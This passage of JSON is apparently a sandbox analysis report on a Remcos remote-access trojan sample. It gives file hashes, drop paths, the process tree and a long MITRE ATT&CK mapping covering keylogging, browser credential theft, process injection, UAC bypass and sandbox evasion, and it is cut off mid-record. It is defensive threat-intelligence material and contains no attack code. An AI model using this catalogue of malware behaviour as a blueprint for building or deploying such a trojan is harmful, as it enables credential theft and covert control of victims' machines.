"description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "logs.dat", "file_path": "%ALLUSERSPROFILE%\\Remcos\\logs.dat", "file_size": 518, "sha256": "88378e36e59c827cdbf596b88c397ca65b23811507665dc6237d191bd6207b9e", "type_tags": ["data"], "description": "data", "runtime_process": "remcos.exe (PID: 1348)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24247)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24247)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 318}, "processes": [{"uid": "00000000-00002984", "name": "e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe", "normalized_path": "C:\\e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe", "sha256": "e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00001348", "parentuid": "00000000-00002984", "name": "remcos.exe", "normalized_path": "%ALLUSERSPROFILE%\\Remcos\\remcos.exe", "sha256": "e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00005076", "name": "remcos.exe", "normalized_path": "%ALLUSERSPROFILE%\\Remcos\\remcos.exe", "sha256": "e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 2, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 18}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 3, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Domain Generation Algorithms", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002", "informative_identifiers_count": 1, "parent": {"technique": "Dynamic Resolution", "attck_id": "T1568", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"CopyFileW\" to copy C:\\e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe to new location %ALLUSERSPROFILE%\\Remcos\\remcos.exe (UID: 00000000-00002984)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75490000\n \"remcos.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75490000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": 